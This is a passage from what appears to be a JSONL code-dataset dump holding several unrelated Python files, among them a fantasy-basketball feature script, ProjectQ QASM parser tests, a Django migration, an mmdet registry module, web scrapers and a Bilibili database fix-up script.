_filter_players_from_gldb_with_no_game_logs_less_than_(25.0)\n print(\"GLDB has {} logs total\".format(len(GLDB[\"all\"])))\n\n\ndef _filter_players_from_gldb_with_no_game_logs_less_than_(cutoff):\n no_hope = []\n for name, gls in GLDB[\"players\"].items():\n good_games = [gl for gl in gls if gl.fanduel_score > cutoff]\n if len(good_games) == 0:\n no_hope.append(name)\n\n for name in no_hope:\n del GLDB[\"players\"][name]\n\n start = len(GLDB[\"all\"])\n GLDB[\"all\"] = [gl for gl in GLDB[\"all\"] if gl.player.name not in no_hope]\n end = len(GLDB[\"all\"])\n\n df = pd.DataFrame([name for name in no_hope], index=range(len(no_hope)), columns=[\"Name\"]) \\\n .sort_values(by=\"Name\")\n\n print(\"REMOVED {} logs from the following players for having never played a good game: \\n{}\"\n .format(start - end, df))\n\n\n# TODO\n# 1. Team_Avg_PTS\n# 2. Opp_Avg_PTS\n\nFEATURES = [\n # \"player_id\",\n # \"team_id\",\n # \"opponent_team_id\",\n\n # \"opponent_let_ppg\",\n # \"home_game\",\n # \"vegas_total\",\n # \"opponent_fppg\",\n\n \"trailing_1_FPPG\",\n \"trailing_1_MIN\",\n \"trailing_1_PTS\",\n \"trailing_1_REB\",\n \"trailing_1_AST\",\n \"trailing_1_BLK\",\n \"trailing_1_STL\",\n \"trailing_1_TO\",\n \"trailing_3_FPPG\",\n \"trailing_3_MIN\",\n \"trailing_3_PTS\",\n \"trailing_3_REB\",\n \"trailing_3_AST\",\n \"trailing_3_BLK\",\n \"trailing_3_STL\",\n \"trailing_3_TO\",\n \"trailing_5_FPPG\",\n \"trailing_5_MIN\",\n \"trailing_5_PTS\",\n \"trailing_5_REB\",\n \"trailing_5_AST\",\n \"trailing_5_BLK\",\n \"trailing_5_STL\",\n \"trailing_5_TO\",\n \"avg_FPPG\",\n \"avg_MIN\",\n \"avg_PTS\",\n \"avg_REB\",\n \"avg_AST\",\n \"avg_BLK\",\n \"avg_STL\",\n \"avg_TO\",\n]\n\n\nTEAMS={}\n\ndef get_opponent_ppg(opp):\n if opp.alias not in TEAMS:\n points_given_up_at_home = sum([g.away_team_score for g in opp.home_games])\n points_given_up_away = sum([g.home_team_score for g in opp.away_games])\n TEAMS[opp.alias] = (points_given_up_at_home + points_given_up_away) / float(len(opp.home_games) + len(opp.away_games))\n return TEAMS[opp.alias]\n\n\ndef df_row(pid, game_day, gl=None, game_str=None):\n player = local[pid]\n\n all_game_logs = GLDB[\"players\"][player.name]\n\n if type(game_day) == datetime:\n game_day = game_day.date() # TODO this sucks, figure out something better\n if game_day > all_game_logs[0].game.date:\n start = 0\n else:\n start = next(i for i in range(len(all_game_logs)) if all_game_logs[i].game.date == game_day)\n start += 1 # don't include the gl for today, not supposed to have happened yet =]\n history = all_game_logs[start:]\n max = 10000\n\n if gl is None:\n glid = None\n fp = None\n opp_team = None\n\n # away, home = game_str.split(\"@\")\n # if player.team.alias == home:\n # home_game = True\n # opp_alias = away\n # else:\n # home_game = False\n # opp_alias = home\n # opp_team = db.session.query(db.Team) \\\n # .filter(db.Team.alias == opp_alias) \\\n # .one()\n else:\n glid = gl.id\n fp = gl.fanduel_score\n\n if player.team.id == gl.game.home_team.id:\n home_game = True\n opp_team = gl.game.away_team\n else:\n home_game = False\n opp_team = gl.game.home_team\n\n # previous_games = [gl for gl in history if gl.game.away_team == opp_team or gl.game.home_team == opp_team]\n # if len(previous_games) > 0:\n # previous_fppg = average_stat(previous_games, \"fanduel_score\", max, check_length=False)\n # previous_fppg *= len(previous_games)\n # # print(\"has previous games\")\n # else:\n # if len(history) > 0:\n # previous_fppg = average_stat(history, \"fanduel_score\", max, check_length=False)\n # previous_fppg = 0\n # else:\n # previous_fppg = None\n\n try:\n return pd.Series({\n \"glid\": glid,\n \"pid\": pid,\n \"draft_date\": game_day,\n \"name\": player.name,\n\n # \"player_id\": player.id,\n # \"team_id\": player.team.alias,\n # \"opponent_team_id\": opp_team.alias,\n\n # \"opponent_let_ppg\": get_opponent_ppg(opp_team),\n # \"home_game\": home_game,\n # \"vegas_total\": gl.game.away_team_score + gl.game.home_team_score,\n # \"opponent_fppg\": previous_fppg,\n\n \"trailing_1_FPPG\": average_stat(history, \"fanduel_score\", 1),\n \"trailing_1_MIN\": average_stat(history, \"stat_MIN\", 1),\n \"trailing_1_PTS\": average_stat(history, \"stat_PTS\", 1),\n \"trailing_1_REB\": average_stat(history, \"stat_REB\", 1),\n \"trailing_1_AST\": average_stat(history, \"stat_AST\", 1),\n \"trailing_1_BLK\": average_stat(history, \"stat_BLK\", 1),\n \"trailing_1_STL\": average_stat(history, \"stat_STL\", 1),\n \"trailing_1_TO\": average_stat(history, \"stat_TO\", 1),\n \"trailing_3_FPPG\": average_stat(history, \"fanduel_score\", 3),\n \"trailing_3_MIN\": average_stat(history, \"stat_MIN\", 3),\n \"trailing_3_PTS\": average_stat(history, \"stat_PTS\", 3),\n \"trailing_3_REB\": average_stat(history, \"stat_REB\", 3),\n \"trailing_3_AST\": average_stat(history, \"stat_AST\", 3),\n \"trailing_3_BLK\": average_stat(history, \"stat_BLK\", 3),\n \"trailing_3_STL\": average_stat(history, \"stat_STL\", 3),\n \"trailing_3_TO\": average_stat(history, \"stat_TO\", 3),\n \"trailing_5_FPPG\": average_stat(history, \"fanduel_score\", 5),\n \"trailing_5_MIN\": average_stat(history, \"stat_MIN\", 5),\n \"trailing_5_PTS\": average_stat(history, \"stat_PTS\", 5),\n \"trailing_5_REB\": average_stat(history, \"stat_REB\", 5),\n \"trailing_5_AST\": average_stat(history, \"stat_AST\", 5),\n \"trailing_5_BLK\": average_stat(history, \"stat_BLK\", 5),\n \"trailing_5_STL\": average_stat(history, \"stat_STL\", 5),\n \"trailing_5_TO\": average_stat(history, \"stat_TO\", 5),\n \"avg_FPPG\": average_stat(history, \"fanduel_score\", max),\n \"avg_MIN\": average_stat(history, \"stat_MIN\", max),\n \"avg_PTS\": average_stat(history, \"stat_PTS\", max),\n \"avg_REB\": average_stat(history, \"stat_REB\", max),\n \"avg_AST\": average_stat(history, \"stat_AST\", max),\n \"avg_BLK\": average_stat(history, \"stat_BLK\", max),\n \"avg_STL\": average_stat(history, \"stat_STL\", max),\n \"avg_TO\": average_stat(history, \"stat_TO\", n=max),\n \"FP\": fp,\n })\n except:\n # print(\"What's up with {} on {}, {} logs\".format(player.name, game_day, len(history)))\n return None\n\n\ndef average_stat_per_min(gls, stat, n):\n if len(gls) < 3:\n raise Exception(\"Need to have at least 3 game logs\")\n\n total_fp = sum([getattr(gl, stat) / gl.stat_MIN for gl in gls[:n]])\n avg = total_fp / float(min(len(gls), n))\n return avg\n\n\ndef average_stat(gls, stat, n, check_length=True):\n if len(gls) < 3 and check_length:\n raise Exception(\"Need to have at least 3 game logs\")\n\n total_fp = sum([getattr(gl, stat) for gl in gls[:n]])\n avg = total_fp / float(min(len(gls), n))\n\n # used = []\n # for gl in gls:\n # if not gl.zeroes:\n # used.append(gl)\n # if len(used) == n:\n # break\n #\n # if len(used) < 3:\n # raise Exception(\"Need to have at least 3 game logs with actual minutes played\")\n #\n # total_fp = sum([getattr(gl, stat) for gl in used])\n # avg = total_fp / float(min(len(used), n))\n\n return avg\n\n\ndef get_features_by_row(date):\n gls = GLDB[\"all\"]\n\n columns = [\"FP\", \"glid\", \"pid\", \"draft_date\", \"name\", ] + FEATURES\n rows = [df_row(gl.player_id, gl.game.date, gl=gl) for gl in gls]\n rows = [r for r in rows if r is not None]\n df = pd.DataFrame(data=rows, index=range(len(rows)), columns=columns)\n return df\n\n\ndef extract(game_day, save=False):\n load_gldb_if_empty(game_day)\n\n with Timed(\"#extract -- features.py\", header=True):\n # TODO - take out bad data? (not enough data for trailing_3 to work properly) see p285, p247, p100,\n\n with Timed(\"Building features dataframe\"):\n df = get_features_by_row(game_day)\n\n if save:\n with Timed(\"Writing to disk\"):\n df.to_csv(features_csv_filename(game_day))\n print(\"features with shape {} saved\".format(df.shape))\n\n return df\n","sub_path":"projects/wakka/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"282587258","text":"# -*- coding: utf-8 -*-\n# Copyright 2021 \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport platform\nimport tempfile\n\nimport pytest\n\nfrom projectq.backends import CommandPrinter\nfrom projectq.cengines import DummyEngine, MainEngine\nfrom projectq.ops import AllocateQubitGate, HGate, MeasureGate, SGate, TGate, XGate\n\n# ==============================================================================\n\n_has_qiskit = True\ntry:\n import qiskit # noqa: F401\n\n from ._parse_qasm_qiskit import read_qasm_file, read_qasm_str\nexcept ImportError:\n _has_qiskit = False\n\nhas_qiskit = pytest.mark.skipif(not _has_qiskit, reason=\"Qiskit is not installed\")\n\n# ------------------------------------------------------------------------------\n\n\n@pytest.fixture\ndef eng():\n return MainEngine(backend=DummyEngine(save_commands=True), engine_list=[])\n\n\n@pytest.fixture\ndef dummy_eng():\n dummy = DummyEngine(save_commands=True)\n eng = MainEngine(backend=CommandPrinter(accept_input=False, default_measure=True), engine_list=[dummy])\n return dummy, eng\n\n\n@pytest.fixture\ndef iqft_example():\n return '''\n// QFT and measure, version 1\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[4];\ncreg c[4];\nh q;\nbarrier q;\nh q[0];\n\nmeasure q[0] -> c[0];\nif(c==1) u1(pi/2) q[1];\nh q[1];\nmeasure q[1] -> c[1];\nif(c==1) u1(pi/4) q[2];\nif(c==2) u1(pi/2) q[2];\nif(c==3) u1(pi/2+pi/4) q[2];\nh q[2];\nmeasure q[2] -> c[2];\nif(c==1) u1(pi/8) q[3];\nif(c==2) u1(pi/4) q[3];\nif(c==3) u1(pi/4+pi/8) q[3];\nif(c==4) u1(pi/2) q[3];\nif(c==5) u1(pi/2+pi/8) q[3];\nif(c==6) u1(pi/2+pi/4) q[3];\nif(c==7) u1(pi/2+pi/4+pi/8) q[3];\nh q[3];\nmeasure q[3] -> c[3];\n'''\n\n\n# ==============================================================================\n\n\ndef filter_gates(dummy, gate_class):\n return [cmd for cmd in dummy.received_commands if isinstance(cmd.gate, gate_class)]\n\n\ndef exclude_gates(dummy, gate_class):\n return [cmd for cmd in dummy.received_commands if not isinstance(cmd.gate, gate_class)]\n\n\n# ==============================================================================\n\n\n@has_qiskit\ndef test_read_qasm_allocation(eng):\n qasm_str = '''\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[1];\ncreg c[1];\nqreg q2[3];\ncreg c2[2];\n'''\n qubits_map, bits_map = read_qasm_str(eng, qasm_str)\n assert {'q', 'q2'} == set(qubits_map)\n assert len(qubits_map['q']) == 1\n assert len(qubits_map['q2']) == 3\n assert {'c', 'c2'} == set(bits_map)\n assert len(bits_map['c']) == 1\n assert len(bits_map['c2']) == 2\n assert all(isinstance(cmd.gate, AllocateQubitGate) for cmd in eng.backend.received_commands)\n\n\n@has_qiskit\ndef test_read_qasm_if_expr_single_cbit(dummy_eng):\n dummy, eng = dummy_eng\n qasm_str = '''\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg a[1];\ncreg b[1];\nif(b==1) x a;\nmeasure a -> b;\nif(b==1) x a;\nmeasure a -> b;\n'''\n qubits_map, bits_map = read_qasm_str(eng, qasm_str)\n assert {'a'} == set(qubits_map)\n assert len(qubits_map['a']) == 1\n assert {'b'} == set(bits_map)\n assert len(bits_map['b']) == 1\n assert len(filter_gates(dummy, AllocateQubitGate)) == 1\n assert len(filter_gates(dummy, XGate)) == 1\n assert len(filter_gates(dummy, MeasureGate)) == 2\n\n\n@has_qiskit\ndef test_read_qasm_custom_gate(eng):\n qasm_str = '''\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\n\nqreg q[3];\ncreg c[3];\ngate cH a,b {\nh b;\nsdg b;\ncx a,b;\nh b;\nt b;\ncx a,b;\nt b;\nh b;\ns b;\nx b;\ns a;\n }\ncH q[0],q[1];\n'''\n\n qubits_map, bits_map = read_qasm_str(eng, qasm_str)\n assert {'q'} == set(qubits_map)\n assert len(qubits_map['q']) == 3\n assert {'c'} == set(bits_map)\n assert len(bits_map['c']) == 3\n assert len(filter_gates(eng.backend, AllocateQubitGate)) == 3\n assert len(filter_gates(eng.backend, XGate)) == 3\n assert len(filter_gates(eng.backend, HGate)) == 3\n assert len(filter_gates(eng.backend, TGate)) == 2\n assert len(filter_gates(eng.backend, SGate)) == 2\n # + 1 DaggeredGate for sdg\n\n\n@has_qiskit\ndef test_read_qasm_opaque_gate(eng):\n qasm_str = '''\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\n\nopaque mygate q1, q2, q3;\nqreg q[3];\ncreg c[3];\n\nmygate q[0], q[1], q[2];\n'''\n qubits_map, bits_map = read_qasm_str(eng, qasm_str)\n assert {'q'} == set(qubits_map)\n assert len(qubits_map['q']) == 3\n assert {'c'} == set(bits_map)\n assert len(bits_map['c']) == 3\n assert len(eng.backend.received_commands) == 3 # Only allocate gates\n\n\n@has_qiskit\ndef test_read_qasm2_str(dummy_eng, iqft_example):\n dummy, eng = dummy_eng\n qubits_map, bits_map = read_qasm_str(eng, iqft_example)\n assert {'q'} == set(qubits_map)\n assert len(qubits_map['q']) == 4\n assert {'c'} == set(bits_map)\n assert len(bits_map['c']) == 4\n\n\n@has_qiskit\ndef test_read_qasm2_file(dummy_eng, iqft_example):\n dummy, eng = dummy_eng\n\n with tempfile.NamedTemporaryFile(mode='w', delete=True if platform.system() != 'Windows' else False) as fd:\n fd.write(iqft_example)\n fd.flush()\n qubits_map, bits_map = read_qasm_file(eng, fd.name)\n\n assert {'q'} == set(qubits_map)\n assert len(qubits_map['q']) == 4\n assert {'c'} == set(bits_map)\n assert len(bits_map['c']) == 4\n","sub_path":"projectq/libs/qasm/_parse_qasm_qiskit_test.py","file_name":"_parse_qasm_qiskit_test.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"108152873","text":"import unittest\nimport os,sys\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.dirname(CURRENT_DIR+\"/../app/\"))\nfrom MainApp import app\n\nclass TestLocalRestApi(unittest.TestCase):\n def setUp(self):\n self.app = app.test_client()\n self.app.testing = True\n\n def testAppStatusCode(self):\n result = self.app.get('/')\n self.assertEqual(result.status_code, 200)\n\n def testAppResultData(self):\n result = self.app.get('/')\n originalData = '{\"message\": \"You can query only in this form: /rpn/\"}\\n'\n testData = bytes(result.data).decode('utf-8')\n self.assertEqual(testData, originalData)\n","sub_path":"project_ruby_python_go_RPN/app/Api_python/test/unitTestLocalRestApi.py","file_name":"unitTestLocalRestApi.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"276653391","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('blog', '0002_comment'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CommentReply',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('reply_text', models.TextField(max_length=350)),\n ('created_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ('comment', models.ForeignKey(related_name='replies', to='blog.Comment')),\n ],\n ),\n ]\n","sub_path":"blog/migrations/0003_commentreply.py","file_name":"0003_commentreply.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"152082242","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © 2011 Red Hat, Inc.\n#\n# This software is licensed to you under the GNU General Public\n# License as published by the Free Software Foundation; either version\n# 2 of the License (GPLv2) or (at your option) any later version.\n# There is NO WARRANTY for this software, express or implied,\n# including the implied warranties of MERCHANTABILITY,\n# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should\n# have received a copy of GPLv2 along with this software; if not, see\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\nimport os\nimport sys\nimport mock\nimport unittest\n\nsys.path.insert(0, os.path.abspath(os.path.dirname(__file__)) + \"/../../../plugins/importers/\")\nfrom pulp_rpm.yum_plugin import util\nimport rpm_support_base\n\nclass TestVerifyOptions(rpm_support_base.PulpRPMTests):\n\n def setUp(self):\n super(TestVerifyOptions, self).setUp()\n self.data_dir = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(__file__)), \"../data\"))\n\n def tearDown(self):\n super(TestVerifyOptions, self).tearDown()\n\n def test_verify_options(self):\n def side_effect(path):\n # no-op to override file removal\n pass\n util.cleanup_file = mock.Mock()\n util.cleanup_file = side_effect\n test_pkg_path = os.path.join(self.data_dir, \"test_repo\", \"pulp-test-package-0.2.1-1.fc11.x86_64.rpm\")\n verify_options = dict(checksum=True, size=True)\n size = 2216\n checksum = \"4dbde07b4a8eab57e42ed0c9203083f1d61e0b13935d1a569193ed8efc9ecfd7\"\n checksum_type = \"sha256\"\n exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertTrue(exists)\n\n # check invalid size\n size = 1232\n t_exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertFalse(t_exists)\n\n # check None size\n size = None\n exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertTrue(exists)\n\n # check invalid checksum\n checksum=\"test_value\"\n exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertFalse(exists)\n\n # skip size/checksum checks\n verify_options = dict(checksum=False, size=False)\n exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertTrue(exists)\n\n # invalid path\n test_pkg_fake_path = os.path.join(self.data_dir, \"test_fake_repo\", \"pulp-test-package-0.2.1-1.fc11.x86_64.rpm\")\n exists = util.verify_exists(test_pkg_fake_path, checksum, checksum_type, size, verify_options)\n self.assertFalse(exists)\n","sub_path":"pulp_rpm/test/unit/server/test_verify_options.py","file_name":"test_verify_options.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"617677371","text":"import numpy as np\nfrom scipy import signal\n\nwith open(\"input\") as f:\n\tlines = [[1 if c == \"#\" else 0 for c in l] for l in f.read().splitlines()]\nalgorithm = np.array(lines[0])\nimage = np.array(lines[2:])\n\nkernel = np.array([[1<<(i*3+j) for j in range(3)] for i in range(3)])\nfor i in range(50):\n\tfill = 0 if i % 2 == 0 else algorithm[0] # Value outside of image\n\tindices = signal.convolve2d(image, kernel, mode=\"full\", boundary=\"fill\", fillvalue=fill)\n\timage = algorithm[indices]\nprint(np.sum(image))\n","sub_path":"2021/day20/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"367486498","text":"import inspect\nimport logging\n\nimport mmcv\nimport torch\n\nlogger = logging.getLogger(__name__)\n\n\nclass Registry(object):\n\n def __init__(self, name):\n self._name = name\n self._module_dict = dict()\n\n def __repr__(self):\n format_str = self.__class__.__name__ + '(name={}, items={})'.format(\n self._name, list(self._module_dict.keys()))\n return format_str\n\n @property\n def name(self):\n return self._name\n\n @property\n def module_dict(self):\n return self._module_dict\n\n def get(self, key):\n return self._module_dict.get(key, None)\n\n def _register_module(self, module_class):\n \"\"\"Register a module.\n\n Args:\n module (:obj:`nn.Module`): Module to be registered.\n \"\"\"\n if not inspect.isclass(module_class):\n raise TypeError('module must be a class, but got {}'.format(\n type(module_class)))\n module_name = module_class.__name__\n if module_name in self._module_dict:\n raise KeyError('{} is already registered in {}'.format(\n module_name, self.name))\n self._module_dict[module_name] = module_class\n\n def register_module(self, cls):\n self._register_module(cls)\n return cls\n\n\ndef build_from_cfg(cfg, registry, default_args=None):\n \"\"\"Build a module from config dict.\n\n Args:\n cfg (dict): Config dict. It should at least contain the key \"type\".\n registry (:obj:`Registry`): The registry to search the type from.\n default_args (dict, optional): Default initialization arguments.\n\n Returns:\n obj: The constructed object.\n \"\"\"\n assert isinstance(cfg, dict) and 'type' in cfg\n assert isinstance(default_args, dict) or default_args is None\n args = cfg.copy()\n obj_type = args.pop('type')\n if mmcv.is_str(obj_type):\n obj_cls = registry.get(obj_type)\n if obj_cls is None:\n raise KeyError('{} is not in the {} registry'.format(\n obj_type, registry.name))\n elif inspect.isclass(obj_type):\n obj_cls = obj_type\n else:\n raise TypeError('type must be a str or valid type, but got {}'.format(\n type(obj_type)))\n if default_args is not None:\n for name, value in default_args.items():\n args.setdefault(name, value)\n\n jit = args.pop('jit', False)\n\n if not jit:\n return obj_cls(**args)\n\n jit_dump_graph_for = args.pop('jit_dump_graph_for', False)\n jit_dump_graph = args.pop('jit_dump_graph', False)\n jit_dump_code = args.pop('jit_dump_code', False)\n\n orig = obj_cls(**args)\n jitted = torch.jit.script(orig)\n orig._jitted = jitted\n _restore_load_state_dict_pre_hooks(orig, jitted)\n if jit_dump_graph_for:\n logger.info(jitted.graph_for, extra=cfg)\n if jit_dump_graph:\n logger.info(jitted.graph, extra=cfg)\n if jit_dump_code:\n logger.info(jitted.code, extra=cfg)\n return jitted\n\n\ndef _restore_load_state_dict_pre_hooks(orig, jitted):\n for key, hook in orig._load_state_dict_pre_hooks.items():\n jitted._load_state_dict_pre_hooks[key] = hook\n orig_children = dict(orig.named_children())\n for name, child in jitted.named_children():\n orig_child = orig_children[name]\n _restore_load_state_dict_pre_hooks(orig_child, child)\n","sub_path":"712f32a/mmdet/utils/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"465749027","text":"import requests\nfrom basic import *\n\n\"\"\"\n母公司利润表\n\"\"\"\n\n\ndef ParentCompanyProfit(path, tradeKey, y_list_mlr):\n # print(tradeKey)\n try:\n f = open(path, \"r\", encoding=\"utf-8\").read()\n df = CutOutM(f, '、母公司利润表', '、合并现金流量表')\n df.reset_index(inplace=True, drop=True)\n # print(df)\n df = df.fillna('')\n Listkeys = df.keys()\n # print(df)\n jsonText = {'DG': []}\n for i in range(1, len(Listkeys)):\n # print(Listkeys[i])\n for j in range(len(y_list_mlr) - 2):\n # print(j)\n # Amount = df.iloc[j, [i]][0]\n # print(Listkeys[i],y_list_pf[j],Amount)\n jsonText['DG'].append(\n {'itemName': y_list_mlr[j],\n 'date': Listkeys[i],\n # 'putintoAmount': Amount,\n 'tradeKey': tradeKey}) # 键值对设置,添加\n dgdata = jsonText['DG']\n\n jsonData = json.dumps(dgdata, indent=4, separators=(',', ': '), ensure_ascii=False)\n data = json.loads(jsonData)\n # print(data)\n Success = requests.post('http://192.168.1.200:9008/parentCompanyProfit/add', json=data)\n print(Success)\n except Exception as e:\n print(e)\n pass\n","sub_path":"dgtable/parent_company_profit.py","file_name":"parent_company_profit.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"190440589","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom python_scrapy_example.example_spider.items import ExampleSpiderItem\n\n\nclass DoubanSpiderSpider(scrapy.Spider):\n name = 'douban_spider'\n allowed_domains = ['movie.douban.com']\n start_urls = ['https://movie.douban.com/top250']\n\n def parse(self, response):\n item = ExampleSpiderItem()\n # print(response.text)\n movie_list=response.xpath('//*[@id=\"content\"]/div/div[1]/ol/li')\n for box in movie_list:\n\n item['serial_number']=box.xpath('.//em/text()').extract()[0]\n item['movie_name']=box.xpath('./div/div[2]/div[1]/a/span[1]/text()').extract()[0]\n # print(item['serial_number'])\n # print(item['movie_name'])\n yield item\n\n url = response.xpath('//*[@id=\"content\"]/div/div[1]/div[2]/span[3]/a/@href').extract()\n\n if url:\n page = 'https://movie.douban.com/top250' + url[0]\n yield scrapy.Request(page, callback=self.parse)\n # 返回url\n\n","sub_path":"python_scrapy_example/example_spider/spiders/douban_spider.py","file_name":"douban_spider.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"247867568","text":"import time\nimport random\nimport logging\nimport asyncio\nimport aiomysql\nimport traceback\nfrom config import MYSQL_CONFIG\nfrom utils.dao import redis_cache\nfrom utils.api_with_cookie import force_get_uid_by_name\nfrom config.log4 import crontab_task_logger as logging\n\n\nasync def fix_missed_uid(execute):\n query = await execute(\"select name, id from biliuser where uid is null;\")\n non_uid_users = {r[0]: r[1] for r in query}\n logging.info(f\"non_uid_users count: {len(non_uid_users)}\")\n\n # 过滤\n block_key_prefix = \"FIX_MISSED_USER_\"\n keys = [f\"{block_key_prefix}{name}\" for name in non_uid_users]\n result = await redis_cache.mget(*keys)\n non_blocked = {}\n blocked = []\n for i, key in enumerate(keys):\n name = key[len(block_key_prefix):]\n if result[i]:\n blocked.append(name)\n else:\n non_blocked[name] = non_uid_users[name]\n logging.info(f\"Failed users: {len(blocked)}, {blocked[:6]}...\")\n\n for current_name, non_uid_obj_id in non_blocked.items():\n uid = await force_get_uid_by_name(current_name)\n if not uid:\n await redis_cache.set(\n key=f\"{block_key_prefix}{current_name}\",\n value=\"f\",\n timeout=3600*24*random.randint(4, 7)\n )\n logging.warning(f\"Cannot get uid by name: `{current_name}`\")\n continue\n\n # 检查该uid是否在表里已存在, 如果不存在,则直接写入\n duplicated = await execute(\"select id, uid, name, face from biliuser where uid = %s;\", uid)\n if not duplicated:\n r = await execute(\"update biliuser set uid=%s where id=%s;\", (uid, non_uid_obj_id), _commit=True)\n logging.info(f\"User obj updated! {current_name}({uid}), obj_id: {non_uid_obj_id}, r: {r}\")\n continue\n\n logging.info(f\"User {current_name}({uid}) duplicated, now fix it. \")\n has_uid_user_obj_id, uid, name, face = duplicated[0]\n\n # 有两个user_obj\n # 1.先把旧的existed_user_obj的name更新\n await execute(\"update biliuser set name=%s where id=%s\", (current_name, has_uid_user_obj_id), _commit=True)\n\n # 2.迁移所有的raffle记录\n r = await execute(\n \"update raffle set sender_obj_id=%s where sender_obj_id=%s;\",\n (has_uid_user_obj_id, non_uid_obj_id),\n _commit=True\n )\n r2 = await execute(\n \"update raffle set winner_obj_id=%s where winner_obj_id=%s;\",\n (has_uid_user_obj_id, non_uid_obj_id),\n _commit=True\n )\n # 3.迁移guard\n r3 = await execute(\n \"update guard set sender_obj_id=%s where sender_obj_id=%s;\",\n (has_uid_user_obj_id, non_uid_obj_id),\n _commit=True\n )\n # 4.删除空的user_obj\n r4 = await execute(\n \"delete from biliuser where id=%s;\",\n (non_uid_obj_id, ),\n _commit=True\n )\n logging.info(f\"Update {current_name}({uid}) done! sender: {r}, winner: {r2}, guard: {r3}, del: {r4}\")\n\n\nasync def main():\n start_time = time.time()\n conn = await aiomysql.connect(\n host=MYSQL_CONFIG[\"host\"],\n port=MYSQL_CONFIG[\"port\"],\n user=MYSQL_CONFIG[\"user\"],\n password=MYSQL_CONFIG[\"password\"],\n db=MYSQL_CONFIG[\"database\"]\n )\n\n async def execute(*args, _commit=False, **kwargs):\n async with conn.cursor() as cursor:\n await cursor.execute(*args, **kwargs)\n if _commit:\n await conn.commit()\n sql = args[0]\n if sql.startswith(\"select\"):\n return await cursor.fetchall()\n return cursor.rowcount\n\n try:\n await fix_missed_uid(execute)\n except Exception as e:\n logging.info(f\"FIX_DATA Error: {e}\\n{traceback.format_exc()}\")\n\n conn.close()\n cost = time.time() - start_time\n logging.info(f\"Execute finished, cost: {cost/60:.3f} min.\\n\\n\")\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n","sub_path":"crontab_task/fix_uid.py","file_name":"fix_uid.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"255849383","text":"import requests\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nfrom prettytable import PrettyTable\n\n# Set up the base URL\nurl = \"https://www.tintenalarm.de/\"\n\n# Getting response from the base URL\nresponse = requests.get(url)\n\n# Parsing the response to HTML using beautiful soup\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\n# Finding all the supplier list\nink_toner_supplier = soup.find(\"div\", {\"id\": \"droppable1\"})\n\n# Getting all the links of suppliers\nsuppliers = ink_toner_supplier.select('a[href]')\n\n# Initializing blank arrays\nsupplier_data = []\n\n# Initializing Table\nsupplier_table = PrettyTable(['SN', 'Brand', 'Title', 'URL'])\n\n# Index counter\nindex = 1\n\n# Parsing supplier data\nfor link in suppliers:\n if (str(link.get('title')) != \"\") & (str(link.get('title')) != \"None\"):\n data = str(link.text) + \"~\" + str(link.get('title')) + \"~\" + str(link.get('href'))\n supplier_table.add_row([str(index), str(link.text), str(link.get('title')), str(link.get('href'))])\n index = index + 1\n supplier_data.append(data)\n\nprint(supplier_table)\n\n# Set up the supplier URL\nsplit_data = 